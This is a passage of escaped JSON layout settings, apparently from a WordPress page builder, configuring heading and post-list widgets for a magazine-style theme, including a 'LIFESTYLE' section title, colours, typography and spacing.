436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#385c7b\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"48.082\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"8\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"#61c436\",\"post_icon_color2_post_list_1\":\"#007AFE\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"600\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"on\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"on\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"51.918\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"u0g757k\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"5\",\"offset\":\"1\",\"category\":[\"8\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"19\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"7a3ej6o\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"LIFESTYLE\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#00c5b5\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\